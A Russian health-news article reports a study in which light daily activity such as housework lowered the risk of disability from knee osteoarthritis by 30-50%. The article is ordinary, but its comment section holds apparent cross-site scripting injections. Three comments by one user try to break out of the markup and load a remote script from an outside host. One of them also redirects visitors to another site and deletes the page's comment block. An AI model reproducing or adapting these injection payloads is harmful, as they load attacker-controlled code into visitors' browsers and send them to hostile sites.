Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обычные домашние дела не ...  >>  Обычные домашние дела не позволят стать вам инвалидом!
 
Обратная связь
 

Обычные домашние дела не позволят стать вам инвалидом!

Размер шрифта
16 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Толкать продуктовую тележку в супермаркете, пылесосить квартиру, прогуливаться по музею – все эти, казалось бы, привычные действия могут помочь вам избежать развития тяжелых заболеваний и даже инвалидности.

Обычные домашние дела не позволят стать вам инвалидом!

Люди, которые проводят более четырех часов в день, занимаясь легкими физическими нагрузками, имеют на 30% меньший риск развития инвалидности, заявляют ученые. «Главная цель – оставаться настолько физически активным, насколько это возможно. Даже небольшие нагрузки будут очень эффективны», – говорит ведущий автор исследования Дороти Данлоп, профессор медицинской школы Университета Чикаго.

Врачи рекомендуют взрослым людям как минимум 2,5 часа в неделю посвящать занятиям спортом. По последним данным, это значительно снижает риск развития инвалидности. Однако некоторые люди из-за своих проблем со здоровьем не могут заниматься с должной нагрузкой. Для них становятся недоступными даже быстрая ходьба, танцы и езда на велосипеде. Так что ученые решили проверить, могут ли небольшие ежедневные физические нагрузки снижать риск развития инвалидности в результате таких заболеваний, как остеоартрит коленного сустава.

В исследовании приняли участие 1 700 человек в возрасте от 45 до 79 лет. Все они находились в группе повышенного риска развития инвалидности из-за артрита коленного сустава. Это заболевание может значительно снизить качество жизни человека, делая практически невозможным выполнение таких простых действий как одевание, принятие душа и даже просто передвижение по дому. Все участники эксперимента носили специальное устройство на бедре – акселерометр. Этот прибор измерял всю их активность в течение для, таким образом давая ученым представление об их привычном распорядке и физических нагрузках.

Через два года исследователи проверили состояние здоровья всех участников, чтобы определить, ухудшилось ли их заболевание. Ученые выяснили, что те люди, в жизни которых ежедневно присутствовали легкие физические нагрузки, имели на 30-50% меньший риск развития инвалидности. Небольшие физические нагрузки также замедляли прогрессирование заболевания. И хотя те люди, кто мог заниматься спортом, имели лучшие результаты, ученые пришли к выводу, что даже легкие физические нагрузки – это уже гораздо лучше, чем ничего.

«Наши результаты дают надежду тем людям, которые не могут увеличить свою физическую нагрузку из-за проблем со здоровьем», – говорит Данлоп. «Чем больше в их жизни небольших нагрузок, тем меньше вероятность развития инвалидности».

Полученные данные подтверждают те рекомендации, которые врачи обычно дают пациентам с остеоартритом. «Мы всегда стараемся донести до наших пациентов, насколько важна физическая активность. Лучшее, чем они могут сами себе помочь – это оставаться активными и снизить вес», – рассказывает доктор Элизабет Матцкин, хирург-ортопед из Бостона. «Если они будут просто застилать постель или мыть посуду – это уже будет неплохо».

Так что слезайте с дивана и сделайте работу по дому – это не только поможет поддержать порядок в квартире, но и позволит вам надолго остаться здоровыми.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

18 января 2015 в 13:25

Комментарий удален за нарушение Правил общения

2 - his shadow

21 января 2015 в 09:26

Цитировать   |   Пожаловаться

А что такое я написала?
то хорошо бы говорить о том, что сам знаешь.
Это "нарушение правил общения",Валяюсь ))))

3 - his shadow

31 января 2015 в 11:20

Цитировать   |   Пожаловаться

"Люди, которые проводят более четырех часов в день, занимаясь легкими физическими нагрузками, имеют на 30% меньший риск развития инвалидности, заявляют ученые."
Вместо диеты Малышевой.
Дёшево и сердито.
Да и ей самой не мешало бы.

4 - zzzzzz

30 июня 2015 в 18:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:21

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Быстрые решения для всего, что болтается и свисает   Сколько лет вашему телу   Как похудеть с помощью скандинавской ходьбы   17-кратный чемпион мира Шаварш Карапетян поддержит детей с первичным иммунодефицитом  
15 мая 2013Ура! Ходить по лестнице так же эффективно для похудения, как ходить в спортивный зал! 04 апреля 2013Когда делать зарядку, чтобы худеть быстрее
 
26 января 2011Почему в старости спорт бесполезен 03 мая 2013Делай меньше, худей также! Ученые разработали суперсхему
 

Слайдшоу

1
Руководство по предотвращению инсульта
Как сохранить здоровье суставов
Шагомер OMRON Walking style One 2.1

Тесты

1
Что вы знаете о цистите?
Как контролировать бронхиальную астму
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.